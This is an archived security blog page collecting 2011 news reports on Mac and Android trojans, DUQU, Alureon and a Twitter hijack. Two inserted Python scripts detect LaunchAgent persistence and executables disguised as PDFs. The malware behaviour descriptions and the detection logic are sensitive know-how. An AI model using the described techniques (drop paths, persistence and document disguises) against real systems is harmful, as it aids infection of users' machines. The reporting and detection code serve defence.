[+] Wayc0de's Blog[+]

Showing posts with the label Trojan. Show all posts

05/11/11

New Mac Malware Variants Found in Trojaned Apps Are Stealing Data

Researchers have discovered a series of variants of the DevilRobber Mac OS X Trojan that have a menu of different capabilities, depending upon the strain, and can not only mine Bitcoins using the infected machine's processing power, but also steal files, install a Web proxy and may steal the user's Safari browsing history.

The new variants of DevilRobber, which has been making the rounds recently, appear to each have a different set of capabilities because they may have each been built for specific jobs, according to an analysis of the malware by researchers at F-Secure. Some of the variants appear to be looking for specific pornographic files on infected Macs and steal passwords from the machine in order to access any files that may be protected. All of the variants of DevilRobber have the ability to take data from the machine and upload it to a remote server.
The new variants were discovered in legitimate Mac applications that had been Trojaned and then shared on Pirate Bay.

"The specific port used by the web proxy depends on the variant. The specific FTP server for data stealing also varies between samples. And DevilRobber's data stealing routine is repeated on a fixed interval — every 43200, 60000, or 100000 seconds, depending on the sample," F-Secure says in its analysis.

Mac malware has been making some headlines in the last few months, as attackers have begun applying to OS X some of the tactics they've been using on Windows for decades. In September, a Trojan called Imuler was found packed inside malicious PDFs, a trick that attackers have been using to get their malware into the hands of users for years now. And earlier in the year the MacDefender malware made a big splash as the first Mac-specific rogue antivirus program to emerge.

Apple is beginning to take some steps to address the threats facing its users, including the announcement this week that all apps submitted to the Mac App Store will have to have a sandbox by March 2012.



Zero-Day Exploit Used for DUQU

We have been closely monitoring developments on the DUQU malware since our initial blog post when the threat broke the news. And just recently, the Hungary-based security laboratory that initially reported about DUQU released more information that sheds more light into the nature of the said threat.

Their report indicates that a Microsoft Word document that triggers a zero-day kernel exploit was identified as the dropper for DUQU. Upon successful exploitation, the Microsoft Word file drops the installer files that load the DUQU components that were initially reported a couple of weeks back.

The installer files are composed of a .SYS file detected as RTKT_DUQU.B, and a .DLL file detected as TROJ_DUQU.B. RTKT_DUQU.B loads TROJ_DUQU.B into the system. TROJ_DUQU.B, on the other hand, drops and decrypts the DUQU components, RTKT_DUQU.A, TROJ_DUQU.ENC, and TROJ_DUQU.CFG. Below is a simple behavior diagram of the threat.



Details regarding the zero-day exploit used have not yet been disclosed. However, Microsoft is expected to release information on it soon. As a member of the Microsoft Active Protections Program (MAPP), if Microsoft provides information on ways we can protect customers while a security patch is being developed, we will add these protections to our products as quickly as possible and update you with that information.


This new information allows us to have more educated theories of how the DUQU attack took place. Considering the usage of a Microsoft Word document, it is likely that this was initially deployed through email messages sent to employees in the targeted organization. This further verifies our earlier hypothesis that DUQU is part of a highly targeted attack aimed at exfiltrating information from targeted entities. For more information on DUQU and the nature of highly targeted attacks, please check the following reports:
We have created the proactive detections of TROJ_DUQUCFG.SME and RTKT_DUQU.SME to address future variants of DUQU component files. Also, the Threat Discovery Appliance (TDA) protects enterprise networks by detecting network activity and the malware's connection to the C&C server through the rules 473 TCP_MALICIOUS_IP_CONN, 528 HTTP_Request_DUQU, and 529 HTTP_Request_DUQU2.

Update as of November 3, 2011, 8:30 PM PST

Microsoft released a security advisory regarding the vulnerability used by DUQU.
The vulnerability exists in the Win32k TrueType font parsing engine and allows elevation of privilege. According to the advisory, a successful exploitation can allow an attacker to run arbitrary code in kernel mode.
We are currently collecting more information about this, and will update this blog entry with our findings as soon as possible.

30/10/11

DevilRobber Mac OS X Trojan horse spies on you, uses GPU for Bitcoin mining

Yesterday, users of Sophos's security products (including our free anti-virus for Mac home users) had their protection automatically updated to protect against a new Mac OS X Trojan horse that has been distributed via torrent sites such as PirateBay.

Copies of the legitimate Mac OS X image editing app GraphicConverter version 7.4 were uploaded to file-sharing networks. However, they came with an unexpected addition.

Hidden inside the download was a copy of the OSX/Miner-D (also known as 'DevilRobber') Trojan horse.

If your Mac computer was infected by the malware, the first thing you might notice is performance becoming sluggish.

That's because OSX/Miner-D tries to generate Bitcoins, the currency of the anonymous digital cash system, by stealing lots of GPU (Graphics Processing Unit) time.
GPUs are much better than regular CPUs at performing the mathematical calculations required for Bitcoin mining.
Yes, this Mac malware is stealing computing time as well as data.

In addition to Bitcoin mining, OSX/Miner-D also spies on you by taking screen captures and stealing your usernames and passwords. In addition, it runs a script that copies information to a file called dump.txt regarding truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history, and .bash_history.

Curiously, the Trojan also hunts for any files that match "pthc". It's unclear whether this is intended to uncover child abuse material or not (the phrase "pthc" is sometimes used on the internet to refer to pre-teen hardcore pornography).
To complete the assault - if the malware finds the user's Bitcoin wallet it will also steal that.

Of course, the producers of GraphicConverter have done nothing wrong themselves - they are victims of the criminals who are using their popular software as a trap to infect Mac users who download software from unofficial sources.

It's possible that other apps have also been distributed via torrent sites infected by the malware, or that the cybercriminals will use other methods to distribute their Trojan horse.

Clearly, Mac users - like their Windows cousins - should practice safe computing and only download software from official websites and legitimate download services. But, in addition to that, it's becoming clearer every week that Mac users need to take malware protection more seriously by running anti-virus software.
There may be a lot less malware for Mac OS X than there is for Windows, but many Mac users are making themselves an unnecessarily soft target by imagining that they are somehow magically protected from threats.

There are a number of anti-virus products available for Mac, including Sophos's free version for home users, so there's really no excuse.

28/10/11

More Mac malware - new Tsunami backdoor variants discovered

As our friends at ESET have mentioned on their blog, new variants of the latest Mac malware - the Tsunami backdoor Trojan - have been discovered.

SophosLabs has received a few new samples of the malware - which can be used both to launch denial-of-service attacks and by remote hackers to gain access to your computer.

The new versions, which Sophos is adding detection for as OSX/Tsunami-Gen, are builds for 32-bit Intel x86 and PowerPC Mac computers, whereas the original version was 64-bit only. In addition, the new samples use a different IRC domain for their command & control server.

Some folks have questioned why the computer security industry has dubbed this threat "Tsunami", and I must admit that I find myself feeling somewhat uncomfortable with the name because of the devastating natural disasters that have struck in some parts of the world.

The truth is, however, that the name derives from one of the commands that can be sent to computers running the malicious code, to flood a target with internet traffic.


It's actually the same command that was built into the Linux version of the attack tool (which Sophos calls Troj/Kaiten) first seen some years ago.

Because we see considerably less malware for Mac OS X than we do for Windows, new Mac threats tend to make the news headlines. It's important to note that the sky is not falling, and we believe the threat posed by OSX/Tsunami is currently quite low. Indeed, we have not received any reports from customers yet of infections by this Mac malware.

Nevertheless, it's clear that someone is working on developing new versions of this code for the Mac platform, and you have to presume they are not doing it purely for the intellectual challenge. (If they are, Lord help them... it's not much of a challenge.)

Mac users would be wise to take preventative steps against this, and the other malware which we see for the Mac OS X platform. Free anti-virus software is available for Mac home users - so there's really no excuse.

26/10/11

Exploit-powered Android Trojan uses update attack

A new DroidKungFu variant poses as a legit application update

A new variant of the DroidKungFu Android Trojan is posing as a legitimate application update in order to infect handsets, according to security researchers from Finnish antivirus vendor F-Secure.

Distributing Android malware as updates is a relatively new tactic that was first seen in July. The primary method of infecting handsets continues to be the bundling of Trojans with legitimate applications; however, the resulting apps are easy to spot because of the extensive permissions they request at installation time.


According to security researchers, the new update-based attacks can have a higher success rate than "Trojanizing" apps because users don't tend to question the legitimacy of updates for already-installed software.

Furthermore, when used by threats like DroidKungFu, update attacks can be hard to detect without specialized antimalware tools. That's because these Trojans use Android exploits to gain root access and then deploy their malicious components unhindered.

The new DroidKungFu variant is distributed with the help of a non-malicious application currently available from third-party app stores in China. However, the threat is global because apps infected with earlier versions of the Trojan have been detected on the official Android Market in the past.

"Once installed, the application would inform the user that an update is available; when the user installs this update, the updated application would then contain extra functionalities, similar to that found in DroidKungFu malware," the F-Secure researchers warn.

The update only asks for access to SMS/MMS messages and location, but also contains a root exploit for Android 2.2 "Froyo" that unlocks all system files and functions. Even though this particular DroidKungFu variant doesn't target devices running Android 2.3 "Gingerbread," there are other Trojans that infect this version of the operating system and could adopt the same attack technique in the future.

In addition, there is reason to believe that the malware's authors are also testing other infection methodologies. Last week, security researchers from mobile antivirus vendor Lookout detected another DroidKungFu variant that doesn't use root exploits at all.

Instead, the new Trojan, which Lookout calls LeNa, uses social engineering to trick users into giving the installer super-user access on devices where users have knowingly executed a root exploit. Once deployed, the malware attaches itself to a native system process.

"This is the first time an Android Trojan has relied fully on a native ELF binary as opposed to a typical VM-based Android application," the researchers explained. The malware is distributed by rogue VPN applications, some of which were found on the official Android Market.

14/10/11

Bogus Netflix Application For Android Steals Passwords, Won't Let You Watch Movies

A report from Symantec claims that malware authors tricked an untold number of Netflix users into coughing up their account credentials with a Trojan horse application that doubled as a Netflix app for the Android platform.

In a blog post, Symantec researcher Irfan Asrar writes about a new piece of malware, Android.Fakenflick (not to be confused with NPR star reporter David Folkenflick, mind you), which looks identical to the legitimate Netflix application, but sends any user name and password entered via the Android phone to a remote server controlled by the attackers. According to Symantec, the malware was first identified on October 10 and has been linked to just a small number of infections. After accepting the user's Netflix credentials, the malware displays a message saying the Android phone is not supported by the application, which is then uninstalled.

The malware is designed to look and behave exactly like the legitimate Netflix application for Android, with a similar look and feel. The application also requests the same permissions of the phone user. Asrar hypothesizes that malware authors were simply jumping on an opportunity to get hungry Netflix users to download their malware, after Netflix released an official Android application that only ran on certain Android phones. An ad hoc effort sprang up to port the app to non-supported platforms. Users who downloaded Fakenflick may have thought they were getting a grayware ported version of the application.

Google's Android mobile operating system has been a leading target of mobile malware writers in the last year. Researchers have uncovered Android versions of popular Windows malware like the Zeus banking Trojan. In June, researchers at North Carolina State University also rang the alarm about a new and stealthy piece of spyware dubbed "Plankton" that was lurking on the Android Marketplace. Google says it suspended a number of applications from the Marketplace in the wake of that revelation. The company was already struggling with persistent infections of Marketplace applications with the DroidDream malware. Kaspersky Lab researchers found that the number of malware signatures for the Android operating system tripled between the first and second quarters of 2011, from just 50 to 150.

02/10/11

Microsoft Pushes Emergency Update After Security Products Call Chrome "Banking Trojan"

Microsoft was forced to push out an emergency update to its Security Essentials and Forefront products Friday after users complained that an updated virus signature intended to spot the Zeus Trojan was, instead, flagging and even removing instances of Google's Chrome Web browser.

The fireworks began early Friday, after Microsoft released an otherwise innocuous signature update for the common Zeus - or Zbot - banking Trojan.

Shortly after it was released, users of Microsoft's Windows Security Essentials and Forefront Security began complaining on Twitter that the products were flagging Chrome as evidence of a Zbot infection and encouraging users to uninstall the product. The Redmond, Washington software firm responded quickly to the complaints, releasing an update to the signature within hours that corrected the detection problem, according to a post on Microsoft's Web page.

"On September 30th, 2011, an incorrect detection for PWS:Win32/Zbot was identified. On September 30th, 2011, Microsoft released an update that addresses the issue." the company said, without mentioning that it was the Chrome browser that was affected.

But users took notice, with many, mindful of Microsoft's reputation as a no-holds-barred competitor, wondering whether the bad signature was a slip-up or a stealth effort to grab back some market share.

"Classifying your competition as malware might be taking things too far MS," wrote a Twitter user with the handle @bryanbrannigan. "Love it! Microsoft Security Essentials just zapped my Google Chrome browser. Let the war begin!" wrote a Twitter user with the handle @EnukSears.

Chrome users who took the bait and allowed their browser to be removed by the Microsoft anti-malware were less pleased. Uninstalling Chrome can cause the loss of bookmarks and other browser plug-ins, as well as require a restart of the "infected" system.

Zeus is a ubiquitous Trojan horse program that is often used to steal credentials from online banking customers using both Windows and common mobile platforms. The Zeus source code was leaked online in May and now Zeus components are showing up in a wide range of malware.

29/09/11

Inside a Modern Mac Trojan

Mac malware is back in the news again. Last week, security firm F-Secure warned that it had discovered a Trojan built for OS X that was disguised as a PDF document. It’s not clear whether this malware is a present threat — it was apparently created earlier this year — but the mechanics of how it works are worth a closer look because it challenges a widely-held belief among Mac users that malicious software cannot install without explicit user permission.


F-Secure said the Mac malware, Trojan-Dropper: OSX/Revir.A, may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a “.pdf.exe” extension and an accompanying PDF icon. F-Secure was careful to note that the payload installed by the dropper, Backdoor:OSX/Imuler.A, phones home to a placeholder page on the Web that does not appear to be capable of communicating back to the Trojan at the moment.

I wanted to understand a bit more about how this Trojan does its dirty work, so I contacted Broderick Aquilino, the F-Secure researcher who analyzed it.

Aquilino said the sample is a plain Mach-O binary, which we’ll call “Binary1”, that contains a PDF file and another Mach-O binary (“Binary2”). Mach-O, short for Mach object, is a file format for executable files on OS X.

According to Aquilino, when you run Binary1, it will extract the PDF file from its body, drop it in the Mac’s temporary or “tmp” directory, and then open it. This is merely a decoy, as Binary1 continues to extract Binary2 from itself — also into the “tmp” directory — and then runs the file.

Upon execution, Binary2 downloads another binary from [omitted malware download site] and saves it as /tmp/updtdata. For the sake of continuity, we’ll call this latest file “Binary3.” Binary2 then executes the downloaded third binary, which opens up a backdoor on the OS X host designed to allow attackers to administer the machine from afar.

“All of this happens without the user needing to input their password,” Aquilino said.


Aquilino believes the Trojan drops its files into the “tmp” directory because the malware is not meant to be permanent.

“Another reason could be that the Trojan is avoiding the need for users running under a Standard account to be authenticated with an Admin account just to be able to infect the system,” he said. “Standard accounts only have access to their home directory and those such as /tmp. However, the account created by OS X setup is an Admin account. Therefore, I believe most will be running under it.

Given that assumption, other malware can choose to run in a directory such as /Application, just like the case of the Fake MacDefender rogue. Take note though, unlike in earlier Windows versions, Admin accounts in OS X are still required to input their password if malware chooses to put its files in a system directory such as /System/Library. I don’t see the need for malware to do that though.”
Aquilino said the malware nevertheless has the potential to be very persistent.

“Upon execution, the downloaded copy of the backdoor (/tmp/updtdata) will create a copy called /users/%user%/library/LaunchAgents/checkvir. It will also create a corresponding launch point in /users/%user%/library/LaunchAgents/checkvir.plist to make sure it still runs after the user reboots the system. Take note of the casing in ‘library’ instead of ‘Library.’ This may be the reason why the sample didn’t work on some test machines. Again, no password is needed since the backdoor installs its files in the user’s home directory (%user%).”

Aquilino observed that the backdoor will only run when the infected account logs in, but he said this doesn’t mean that other accounts on the infected machine are safe.

“The risk is the same if these accounts save their files in shared volumes where the infected account has permission to,” he said.
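The persistence mechanism Aquilino describes (a launchd job in the user's LaunchAgents folder pointing at a binary the user can write without a password) is something a defender can audit. The following Python script is an added example, not code from the article or from F-Secure: it parses each LaunchAgent plist, flags jobs whose program lives in a user-writable location, jobs that start automatically at login, programs missing from disk, and the non-standard lowercase 'library' casing the article mentions. The sample jobs and paths it builds are constructed placeholders.

```python
"""Audit per-user LaunchAgents for persistence like the Imuler 'checkvir' job."""
import os
import plistlib
import tempfile
from pathlib import Path

# Locations a Standard (non-admin) account can write without a password prompt.
# A legitimate agent may live here too, so treat a hit as a triage hint, not proof.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/users/", "/var/folders/")


def launch_program(job):
    """Return the executable launchd would start for this job, or None."""
    args = job.get("ProgramArguments")
    if isinstance(args, list) and args:
        return str(args[0])
    program = job.get("Program")
    return str(program) if program else None


def audit_launch_agent(plist_path):
    """Return a list of human-readable findings for one LaunchAgent plist."""
    findings = []
    with open(plist_path, "rb") as fh:
        job = plistlib.load(fh)
    program = launch_program(job)
    if program is None:
        return ["no Program/ProgramArguments key (malformed job)"]
    if program.lower().startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"program runs from user-writable path: {program}")
    if job.get("RunAtLoad") or job.get("KeepAlive"):
        findings.append("job starts automatically at login (RunAtLoad/KeepAlive)")
    if not os.path.exists(program):
        findings.append(f"program not present on disk: {program}")
    # The default macOS file system is case-insensitive, so 'library' still
    # resolves to 'Library'; the odd casing is a hint that no normal installer
    # wrote this job (the article notes the sample used exactly this spelling).
    if "/library/" in program:
        findings.append("lowercase 'library' in path (non-standard casing)")
    return findings


def audit_directory(agents_dir):
    """Map each *.plist in agents_dir to its findings (empty list == clean)."""
    report = {}
    for path in sorted(Path(agents_dir).glob("*.plist")):
        try:
            report[path.name] = audit_launch_agent(path)
        except (plistlib.InvalidFileException, ValueError) as exc:
            report[path.name] = [f"unparseable plist: {exc}"]
    return report


def build_sample_dir():
    """Create constructed sample jobs (not real malware) in a temp directory."""
    tmp = tempfile.mkdtemp(prefix="launchagents_")
    # Modelled on the checkvir.plist layout described above; the path is made up.
    suspicious = {
        "Label": "checkvir",
        "ProgramArguments": ["/users/victim/library/LaunchAgents/checkvir"],
        "RunAtLoad": True,
    }
    # A benign-looking job pointing at a (hypothetical) vendor binary.
    benign = {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"],
        "StartInterval": 3600,
    }
    for name, job in (("checkvir.plist", suspicious),
                      ("com.example.updater.plist", benign)):
        with open(os.path.join(tmp, name), "wb") as fh:
            plistlib.dump(job, fh)
    return tmp


if __name__ == "__main__":
    # On a real Mac, point this at os.path.expanduser("~/Library/LaunchAgents").
    for name, findings in audit_directory(build_sample_dir()).items():
        print(name, "->", findings or ["clean"])
```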


In other Mac malware news, Mac security vendor Intego is warning about an OS X Trojan called “Flashback” that disguises itself as a Flash update.

It’s worth noting that these threats, like most of those facing Windows users today, rely on social engineering — tricking the user into clicking an attachment or link. Regardless of which operating system you use, it’s a good idea to develop a healthy sense of skepticism and paranoia about any unexpected documents that arrive via e-mail, or random prompts to “update” software. Rule #1 from my 3 Basic Rules for Online Safety applies just as well to Mac users as it does folks using Windows: “If you didn’t go looking for it, don’t install it!”

I still don’t believe it’s necessary for Mac users to install anti-virus software, but for those who disagree there are certainly a number of free and affordable options for anti-malware protection on OS X. Sophos offers a free anti-virus product for the Mac, as does ClamXav and PCTools. There are also several non-free options.

27/09/11

New Mac Trojan Pretends to Be Flash

Mac malware is still quite rare, but there is one new threat floating around that you should be aware of. A new Trojan for Mac OS X disguises itself as an installer for the Adobe Flash Player browser plug-in, according to security software company Intego. The good news (if you want to call it that)? This new malware doesn't appear to have spread very far as of yet.

According to Intego, this Trojan spreads via malicious sites that feature links asking you to download Flash Player (recent versions of Mac OS X don't come with Flash Player pre-installed). Instead of being taken to the Adobe Flash site when clicking the link, you'll inadvertently download the Trojan instead. The Trojan looks and acts like any typical Mac installer package--in fact, if you have the "Open 'safe' files after downloading" box checked in Safari, the installer will open automatically.

Intego is still trying to learn more about this particular Trojan, but the company says that "the installer for this Trojan horse will deactivate some network security software, and, after installation, will delete the installation package itself." From there, the Trojan "installs a dyld (dynamic loader) library and auto-launch code, allowing it to inject code into applications the user launches." Put in English, it basically turns good apps bad by making them run malicious tasks.

The malware then gathers information about your Mac, including its MAC address, and sends it to a server, which, according to Intego, "will allow the malware to detect if a Mac is infected."

But there's no need to panic: Intego says they've received only one report of this malware in the wild, so as of right now, this particular Trojan doesn't appear to have spread very far.

To keep it from spreading further, and to keep from becoming its next victim, there are a couple steps you can take. First, only download and install the version of Flash available directly from Adobe. Not only does it ensure that you'll get the real thing, but it ensures that you'll get the latest version, complete with the newest security fixes.

Also, if you use Safari, select Preferences from the Safari menu, click General, then un-check the box labeled "Open 'safe' files after downloading". This will prevent installers and other files (images, text documents, etc...) from opening automatically when you download them. In addition, don't open any downloads that you weren't expecting--this will prevent you from being taken advantage of by so-called drive-by downloads and other threats.

nb : pcworld

Alureon Rootkit Morphs Again, Adds Steganography

The Alureon rootkit has become a major headache not just for its victims, with its insidious infection routines and persistence once on a machine, but also for researchers trying to identify new versions and unwind its new tactics and techniques. The latest hurdle thrown up by Alureon is the use of steganography to hide configuration files that update infected machines with new instructions.

The steganography usage has shown up in a specific version of Alureon that often is downloaded by a Trojan and then installed on the victim's machine. The malware has a new function that goes out to a remote Web site and downloads a new component called "com32", which, once decrypted, presents a list of URLs hosted on LiveJournal and WordPress. Each of the pages simply hosts a series of image files, which look to be harmless at first glance. But when researchers at Microsoft looked deeper into the code that is responsible for retrieving the image files, they discovered that the code looks specifically for some IMG HTML tags.

The rootkit then tries to pull down the JPEGs, and along with the image data comes a long string of characters that looks to be a password of some kind, according to the analysis by Scott Molenkamp of Microsoft's Malware Protection Center.

"After further investigation, I was able to determine that embedded within each of the JPGs was a complete configuration file using steganography. One of the critical sections of the configuration file contains the list of command and control servers. The purpose of the publicly hosted data was revealed -- it's there to provide a layer of redundancy and defense against existing domains that might become unavailable. In the event that no command and control server could be contacted, Alureon would then seek to retrieve an updated configuration file from these 'backup' locations," Molenkamp wrote.

The images being used to hide the configuration file look to be completely random, unless the attacker behind Alureon is a health nut who loves his grandma and "Tropic Thunder." The JPEGs include a picture of an elderly woman, a bowl of something sort of health-food looking and...Tom Cruise.

Alureon, which also is known as TDSS or TDL4, has been a serious problem for a couple of years now. The addition of a steganography routine is just the latest in a line of new features added to the malware in the last few months. Earlier this year researchers came across a version of Alureon that was using an older brute-force technique in order to decrypt some components of its own code that are encrypted. And in June another variant appeared that had its own self-replicating loader which allowed Alureon to spread via network shares once it's on a victim's machine.

nb : threatpost

USA Today's Twitter account falls foul of hackers

USA Today is the latest high profile Twitter account to have fallen victim to a group of hackers.

A group calling themselves the Script Kiddies have claimed responsibility for the hack, which involved posting a series of messages to the official USA Today Twitter account, including:
"Fox News, Wal-mart, Unilevel, Pfizer, NBC and now USA Today. who's next? Vote now! [LINK]"
and
"Please like The Script Kiddies on Facebook! You could choose our next target!"
Fortunately, USA Today was able to regain control of the account (with some assistance from Twitter) before any serious harm could be caused. The newspaper tweeted an apology to its followers:


The Script Kiddies group has previously claimed responsibility for hacking into the NBC News Twitter account to post fake news reports of a terrorist attack involving planes in New York, defacing Pfizer's Facebook page and breaking into the Fox News Politics Twitter account to post a bogus announcement about the death of Barack Obama.

It's unclear how the USA Today Twitter account was compromised, but there was speculation that the hack by the same group against NBC News's Twitter account was assisted by a spyware Trojan horse.

The Script Kiddies might believe that their hacks against media organisations are just childish pranks, but it's unlikely that the authorities find them amusing. The more social media accounts that they target, the more the computer crime police will be keen to bring them to justice.

As always, we recommend that social networking users ensure that they keep their security software up-to-date, choose hard-to-crack passwords and do not use the same password in more than one place.

nb : nakedsecurity.sophos

24/09/11

New Mac malware poses as PDF doc

The Trojan code is crude and can't yet connect to control server, say security firms

Security firms today warned Mac users of a new Trojan horse that masquerades as a PDF document.

The malware, which was spotted by U.K.-based Sophos and Finnish antivirus vendor F-Secure, uses a technique long practiced by Windows attackers.


"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a '.pdf.exe' extension and an accompanying PDF icon," said F-Secure today.

That practice relies on what is called the "double extension" trick: adding the characters ".pdf" to the filename to disguise an executable file.
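Both the Revir/Imuler dropper discussed earlier on this page and the Windows "double extension" trick rely on a name that says "document" while the bytes say "executable", so the practical check is to classify a file by its leading bytes and compare that with what the name claims. The following Python code is an added example, not from the article or from Sophos/F-Secure; it goes a little beyond the page by recognising Mach-O (32-bit, 64-bit and universal) as well as Windows PE and PDF headers, and by reading the Mach-O filetype field so a real executable is distinguished from a library. The Mach-O and PE magic values are the formats' real constants; the sample blobs and names are constructed.

```python
"""Flag files whose name claims a document but whose contents are an executable."""
import struct

# Mach-O header filetype values from <mach-o/loader.h>.
MH_FILETYPES = {1: "object", 2: "executable", 6: "dylib", 8: "bundle"}
# magic bytes -> (description, byte order used for the rest of the header)
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": ("Mach-O 32-bit", ">"),
    b"\xce\xfa\xed\xfe": ("Mach-O 32-bit", "<"),
    b"\xfe\xed\xfa\xcf": ("Mach-O 64-bit", ">"),
    b"\xcf\xfa\xed\xfe": ("Mach-O 64-bit", "<"),
}
FAT_MAGIC = b"\xca\xfe\xba\xbe"  # universal binary (Java .class files share it)

DOCUMENT_EXTENSIONS = {"pdf", "doc", "jpg", "txt"}   # what a victim expects to open
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "bat"}  # the hidden Windows suffix


def content_type(data):
    """Classify a blob by its leading bytes, ignoring its name entirely."""
    magic = data[:4]
    if magic in MACHO_MAGICS and len(data) >= 16:
        desc, order = MACHO_MAGICS[magic]
        # mach_header: magic, cputype, cpusubtype, filetype, ... -> filetype at +12
        filetype = struct.unpack_from(order + "I", data, 12)[0]
        return f"{desc} {MH_FILETYPES.get(filetype, 'filetype %d' % filetype)}"
    if magic == FAT_MAGIC:
        return "Mach-O universal binary"
    if data[:2] == b"MZ":
        return "Windows PE executable"
    if data[:5] == b"%PDF-":
        return "PDF document"
    return "unknown"


def extension_chain(filename):
    """Every extension in a name: 'report.pdf.exe' -> ['pdf', 'exe']."""
    parts = filename.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def assess(filename, data):
    """Return (verdict, reason); verdict is disguised/executable/document/unknown."""
    kind = content_type(data)
    exts = extension_chain(filename)
    is_exec = kind.startswith(("Mach-O", "Windows PE"))
    if (len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS
            and exts[-1] in EXECUTABLE_EXTENSIONS):
        return "disguised", f"double extension .{exts[-2]}.{exts[-1]}: document-looking name on an executable"
    if exts and exts[-1] in DOCUMENT_EXTENSIONS and is_exec:
        # The Mac case: no .exe needed, the icon can live in a resource fork.
        return "disguised", f"named .{exts[-1]} but contents are {kind}"
    if is_exec:
        return "executable", f"{kind} with no document extension"
    return ("document" if kind == "PDF document" else "unknown"), kind


def fake_macho64(filetype=2):
    """Constructed 32-byte Mach-O 64-bit header (x86_64, zero load commands)."""
    return b"\xcf\xfa\xed\xfe" + struct.pack("<IIIIIII", 0x01000007, 3, filetype, 0, 0, 0, 0)


if __name__ == "__main__":
    samples = [  # constructed, not real malware
        ("notice.pdf", fake_macho64()),
        ("report.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60),
        ("notice.pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"),
        ("updtdata", fake_macho64()),
    ]
    for name, blob in samples:
        print(name, "->", assess(name, blob))
```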

The Mac malware uses a two-step process, composed of a Trojan "dropper" utility that downloads a second element, a Trojan "backdoor" that then connects to a remote server controlled by the attacker, using that communications channel to send information gleaned from the infected Mac and receiving additional instructions from the hacker.

Because it doesn't exploit a vulnerability in Mac OS X -- or any other software -- the malware instead must dupe users into downloading and opening the seemingly-innocuous PDF document, which is actually an executable.

Once run, the dropper downloads the second-stage backdoor and opens a Chinese-language PDF. F-Secure said that the PDF was another sleight-of-hand trick: "[The dropper component] drops a PDF file in the /tmp folder, then opens it to distract the user from noticing any other activity occurring," the company said in a description of the attack.

Both Sophos and F-Secure noted that the malware doesn't work reliably, and currently can't connect to the C&C (command-and-control) server because the latter isn't fully functional.

Mac malware is typically crude in comparison with what targets Windows PCs.
Because the C&C server is not yet operational and since it found samples of the Trojans on VirusTotal -- a free service that runs malware against a host of antivirus engines -- F-Secure speculated that the malware is still in the testing phase.

Although Apple's Mac OS X includes a bare-bones antivirus detector, it has not been updated to detect the just-noticed Trojan dropper or backdoor. Checks of several Computerworld Macs running Lion, for instance, found that Apple last updated its detector on Aug. 9.

Mac users had their biggest malware scare earlier this year, when a series of fake security programs, dubbed "scareware," were aimed at them.

Several antivirus companies, including Sophos, F-Secure and Intego, offer security software for the Mac.

nb : infoworld

23/09/11

Researchers find Mac OS X malware posing as PDF file

Summary: The malware installs a backdoor that contacts a remote server for instructions and can be used to steal files or capture a screenshot of the infected computer system.


Researchers at F-Secure have discovered a Mac OS X malware file masquerading as a PDF file to lure users into installing a backdoor trojan.

The malware, flagged as a trojan dropper, installs a downloader component that downloads a backdoor program onto the system, while camouflaging its activity by opening a PDF file to distract the user.

According to F-Secure, the PDF file contains Chinese-language text related to political issues, which some users may find offensive.

The use of a PDF file as a social engineering gimmick is widely used by malicious hackers on the Windows platform and F-Secure’s research team believes this is an attempt to copy the trick of opening a PDF file containing a “.pdf.exe” extension and an accompanying PDF icon.
 
“The sample on our hand does not have an extension or an icon yet. However, there is another possibility. It is slightly different in Mac, where the icon is stored in a separate fork that is not readily visible in the OS. The extension and icon could have been lost when the sample was submitted to us. If this is the case, this malware might be even stealthier than in Windows because the sample can use any extension it desires,” the company said.


Once installed, the trojan dropper installs a backdoor program that gives a hacker full control of the infected Mac OS X machine.

The backdoor typically contacts a remote server for instructions and can be used to steal files or capture a screenshot of the infected computer system, which is then forwarded to the remote server.

F-Secure reports that the command-and-control of the malware is just a bare Apache installation that is not yet capable of communicating with the backdoor.

nb : zdnet

Mac OS X Trojan hides behind malicious PDF disguise

A fascinating new example of Mac malware has been discovered, that appears to be adopting an old Windows-style disguise to fool users into running it.

Despite the numerous times that cybercriminals have created boobytrapped PDF files that exploit vulnerabilities to infect unsuspecting users, many people still think that PDF files are somehow magically safer to open than conventional programs.

The OSX/Revir-B Trojan plays on this by posing as a PDF file.

When the malicious Macintosh application file is run it tries to drop a PDF embedded inside it onto the user's hard drive. The Chinese language PDF file displayed is about a controversial topic, "Do the Diaoyu Islands belong to Japan?"

The Diaoyu Islands (known as the Senkaku islands in Japan) are the subject of a long-running dispute between the two countries, with both claiming sovereignty.
Because the document is opened, users may believe that they have opened a harmless PDF rather than run a program.

Malicious PDF

When we tested the malware inside our labs, we couldn't manage to get it to execute as the author probably intended - however, strings embedded deep inside its code make it clear that it was written with malicious intent.

Malware code

The malware attempts to install a backdoor Trojan horse (detected by Sophos as OSX/Imuler-A) which would give malicious hackers remote access to your Apple Mac computer.

As our friends at F-Secure point out, we have seen plenty of Windows malware in the past which has pretended to be a PDF rather than an EXE - sometimes using techniques such as the double-extension trick (for instance, filename.PDF.EXE).

It's quite possible that this is evidence that Mac malware authors are attempting something similar, moving on from the fake anti-virus alerts that blighted many Mac users earlier this year.

Customers of Sophos, including users of Sophos's free anti-virus for Mac, are protected against the malware.

nb : nakedsecurity.sophos

New Mac OS X Trojan Imuler Hides Inside Malicious PDF

Malware that targets Mac OS X isn't anywhere near catching up to Windows-based malware in terms of volume and variety, but it seems that OS X malware may be adopting some of the more successful tactics that Windows viruses have been using to trick users. Researchers have come across a sample of an OS X-based Trojan that disguises itself as a PDF file, a technique that's been in favor among Windows malware authors for several years now.

The new piece of malware hides inside a PDF file and delivers a backdoor that hides on the user's machine once the malicious file is opened. Once the user executes the malware, it puts the malicious PDF on the user's machine and then opens it as a way to hide the malicious activity that's going on in the background, according to an analysis by researchers at F-Secure. The Trojan then installs the backdoor, which is named Imuler.A, which attempts to communicate with a command-and-control server.

That server isn't capable of communicating with the malware, however, the researchers found, so the malware is on its own once it's installed on a victim's machine. What's not clear is exactly how the malware is spreading right now.

